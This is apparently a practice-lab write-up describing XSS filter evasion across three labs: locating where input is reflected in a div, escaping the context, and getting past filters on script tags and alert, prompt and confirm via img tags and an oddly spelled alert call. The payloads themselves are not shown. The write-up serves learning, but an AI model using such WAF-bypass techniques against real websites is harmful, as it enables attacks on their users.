XSS Filtering and Evasion
Labs from RXSS to practice filter evasion
Lab 11
Step 1: Check where our input is reflected
Our canary is reflected inside <div>
tag
Step 2: Escape from the context
This payload allows me to escape from the context
Step 3: Craft an appropriate payload
However, the following payload did not work. After some trial and errors, we noticed that both the alert
function and script
tag were filtered by the web application.
We had to think of a way to fire XSS without the use of script
and alert
.
This payload below fired a XSS.
Lab 12
Step 1: Identify where my input get reflected
My input get reflected inside a <div>
tag.
Step 2: Try to escape the context
We were able to escape from the context with this payload
Step 3: Craft an appropriate payload
Next, we tried to identify whether the alert
tag get sanitized with this payload
However, the prompt()
function worked to fire the XSS!
Lab 13
Step 1: Identify where our canary get reflected
Step 2: Try to escape the context
Again, this payload allows us to escape the context. HTML injection is thus possible.
Step 3: Craft the payload
To identify what is being sanitized by the WAF and what does not, change only one parameter at the time in your crafted payload.
After few attempts, the testers noticed that the img
tag was not sanitized. This tag could be used to craft a proper payload.
Now, the testers had to identify what functions and attributes can lead to a XSS. Crafting the proper payload is a lot of trials and errors.
After few attempts, we noticed that prompt()
, alert()
and confirm()
were all functions being blocked by the WAF. However, I searched on Google how to bypass the alert()
function and found this payload:
The alert()
function is weirdly spelled so it did not get blocked by the WAF but correctly interpreted by the browser, which allows me to fire the XSS!
Last updated